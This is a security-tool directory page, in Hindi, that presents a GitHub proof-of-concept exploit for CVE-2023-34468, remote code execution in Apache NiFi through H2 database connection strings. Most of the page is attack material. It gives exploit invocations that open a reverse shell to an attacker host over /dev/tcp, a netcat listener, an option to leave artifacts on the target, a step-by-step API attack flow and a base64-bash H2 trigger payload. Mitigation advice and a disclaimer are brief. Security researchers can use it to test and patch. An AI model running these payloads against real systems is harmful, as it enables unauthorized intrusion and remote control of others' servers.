Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-34468 — CVE-2023-34468 - Apache NiFi H2 RCE PoC | Kitploit
उपकरण/GitHubGitHub/jeanpt/cve-2023-34468
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjeanpt/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 - Apache NiFi H2 RCE PoC

रिपॉजिटरी देखें
144 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34468 एक्सप्लॉइट

GitHub stars GitHub license

अवलोकन

यह रिपॉज़िटरी CVE-2023-34468 के लिए एक Python-आधारित एक्सप्लॉइट टूल प्रदान करती है, जो Apache NiFi संस्करण 0.0.2 से 1.21.0 में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता (CVSS 9.8) है। यह प्रमाणित उपयोगकर्ताओं को एम्बेडेड ट्रिगर्स के साथ H2 डेटाबेस कनेक्शन स्ट्रिंग्स में हेरफेर करके मनमाना कोड निष्पादित करने की अनुमति देता है।

⚠️ चेतावनी: केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

भेद्यता विवरण

  • CVE ID: CVE-2023-34468
  • प्रभावित संस्करण: Apache NiFi 0.0.2–1.21.0
  • प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • CVSS स्कोर: 9.8 (गंभीर)
  • खोज तिथि: 12 जून, 2023
  • विवरण: DBCPConnectionPool और HikariCPConnectionPool कंट्रोलर सर्विसेज़ उपयोगकर्ताओं को H2 ड्राइवर के साथ एक डेटाबेस URL कॉन्फ़िगर करने की अनुमति देती हैं, जो H2 की CREATE TRIGGER कार्यक्षमता के माध्यम से मनमाना Java कोड निष्पादन सक्षम बनाती है। जब कनेक्शन प्रारंभ होता है, तो एम्बेडेड JavaScript कोड NiFi के विशेषाधिकारों के साथ निष्पादित होता है।

पूर्वापेक्षाएँ

  • Python 3.7+
  • requests लाइब्रेरी
टूल डाउनलोड करें
  • NiFi API तक नेटवर्क पहुँच (डिफ़ॉल्ट पोर्ट 8080 या 8443)
  • बिना प्रमाणीकरण वाला लक्षित NiFi इंस्टेंस या मान्य क्रेडेंशियल्स
  • रिवर्स शेल के लिए लिसनर सेटअप (जैसे, nc -lnvp 5555)
  • त्वरित आरंभ

    क्लोन और इंस्टॉल करें

    root@kitploit:~
    git clone https://github.com/Jeanpt/CVE-2023-34468.git
    cd CVE-2023-34468
    pip install -r requirements.txt
    

    बिना प्रमाणीकरण वाला NiFi (कोई क्रेडेंशियल्स आवश्यक नहीं)

    root@kitploit:~
    # अपना लिसनर शुरू करें
    nc -lnvp 5555
    
    # एक्सप्लॉइट चलाएँ — auth स्वतः-पता लगाया जाता है, खुले इंस्टेंस के लिए कोई फ्लैग आवश्यक नहीं
    python3 exploit.py \
      -t http://nifi.target.com:8080 \
      -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
      -lh ATTACKER_IP \
      -lp 5555
    

    प्रमाणित NiFi (यूज़रनेम/पासवर्ड)

    root@kitploit:~
    python3 exploit.py \
      -t https://nifi.target.com:8443 \
      -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
      -lh ATTACKER_IP \
      -lp 5555 \
      -u admin -p password123
    

    प्रमाणित NiFi (बियरर टोकन)

    root@kitploit:~
    python3 exploit.py \
      -t https://nifi.target.com:8443 \
      -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
      -lh ATTACKER_IP \
      -lp 5555 \
      --token <your_bearer_token>
    

    क्लीनअप छोड़ें (लक्ष्य पर आर्टिफैक्ट्स छोड़ें)

    root@kitploit:~
    python3 exploit.py -t http://target:8080 -c "..." -lh ATTACKER_IP -lp 5555 --no-cleanup
    

    सभी विकल्प

    root@kitploit:~
    python3 exploit.py --help
    
    कमांडविवरण
    -t, --targetलक्षित NiFi इंस्टेंस URL (आवश्यक)
    -c, --commandनिष्पादित करने हेतु कमांड (आवश्यक)
    -lh, --lhostकॉलबैक के लिए लिसनर होस्ट (आवश्यक)
    -lp, --lportकॉलबैक के लिए लिसनर पोर्ट (आवश्यक)
    -u, --usernameNiFi यूज़रनेम (प्रमाणित इंस्टेंस)
    -p, --passwordNiFi पासवर्ड (प्रमाणित इंस्टेंस)
    --tokenबियरर टोकन (प्रमाणित इंस्टेंस)
    --no-cleanupएक्सप्लॉइटेशन के बाद क्लीनअप छोड़ें
    --delayक्लीनअप से पहले प्रतीक्षा हेतु सेकंड (डिफ़ॉल्ट: 10)
    --driver-pathH2 ड्राइवर jar पथ ओवरराइड करें (डिफ़ॉल्ट रूप से छोड़ा गया)

    सत्यापन: रिवर्स शेल कनेक्शन के लिए अपना लिसनर जाँचें। कोड निष्पादन की पुष्टि के लिए id चलाएँ।

    यह कैसे काम करता है (तकनीकी विवरण)

    अटैक फ्लो

    1. रीकॉनिसांस: /nifi-api/system-diagnostics के माध्यम से NiFi संस्करण की पहचान करें
    2. DBCP सर्विस बनाएँ: /nifi-api/process-groups/root/controller-services पर दुर्भावनापूर्ण H2 कनेक्शन स्ट्रिंग POST करें
    3. प्रोसेसर बनाएँ: उसी प्रोसेस ग्रुप में ExecuteSQL प्रोसेसर POST करें
    4. प्रोसेसर कॉन्फ़िगर करें: प्रोसेसर को दुर्भावनापूर्ण DBCP सर्विस से संबद्ध करें
    5. सर्विस सक्षम करें: state ENABLED के साथ /nifi-api/controller-services/{id}/run-status पर PUT करें
    6. RCE ट्रिगर करें: state RUNNING के साथ /nifi-api/processors/{id}/run-status पर PUT करें — कनेक्शन पर H2 ट्रिगर सक्रिय होता है

    H2 पेलोड संरचना

    root@kitploit:~
    jdbc:h2:file:/tmp/{random_db}.db;TRACE_LEVEL_SYSTEM_OUT=0\;CREATE TRIGGER {random_name}
    BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
    java.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}')
    $$--=x
    

    मुख्य बिंदु:

    • सेमीकोलन को बैकस्लैश से एस्केप करें: \;
    • JavaScript BEFORE SELECT ON INFORMATION_SCHEMA.TABLES पर सक्रिय होता है (स्वतः-ट्रिगर्ड)
    • विशेष वर्ण समस्याओं से बचने के लिए पेलोड को Base64 एन्कोड करें
    • H2 पार्सिंग समस्याओं से बचने के लिए पैडिंग बराबर चिह्नों को स्पेस से बदल दिया जाता है

    पेलोड उदाहरण

    रिवर्स शेल

    root@kitploit:~
    # एक्सप्लॉइट सीधे चलाएँ
    python3 exploit.py -t http://target:8080 -c "bash -i >& /dev/tcp/10.10.16.46/5555 0>&1" -lh 10.10.16.46 -lp 5555
    

    कमांड निष्पादन

    root@kitploit:~
    python3 exploit.py -t http://target:8080 -c "touch /tmp/pwned" -lh 127.0.0.1 -lp 5555
    

    शमन (मिटिगेशन)

    • अपडेट करें: Apache NiFi 1.22.0 या उसके बाद के संस्करण में अपग्रेड करें
    • एक्सेस नियंत्रण: फ़ायरवॉल/WAF के माध्यम से NiFi API पहुँच प्रतिबंधित करें
    • प्रमाणीकरण: NiFi पर प्रमाणीकरण सक्षम और लागू करें
    • निगरानी: असामान्य कंट्रोलर सर्विस कॉन्फ़िगरेशन पर अलर्ट करें
    • नेटवर्क सेगमेंटेशन: NiFi को अविश्वसनीय नेटवर्क से अलग रखें

    संदर्भ

    • NVD - CVE-2023-34468
    • Apache NiFi सुरक्षा सलाह
    • NIFI-11653 - इश्यू ट्रैकर
    • Apache मेलिंग लिस्ट चर्चा

    अस्वीकरण

    यह टूल केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान किया गया है। लेखक इस एक्सप्लॉइट के दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। केवल अधिकृत वातावरण में ही ज़िम्मेदारी से परीक्षण करें।

    क्रेडिट्स

    • खोज: Matei "Mal" Badanoiu
    • Metasploit मॉड्यूल: h00die
    • Python POC: Jean

    लाइसेंस

    MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें


    सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए निर्मित।

    Topics: apache-nifi h2-database rce exploit cve-2023-34468 python security-research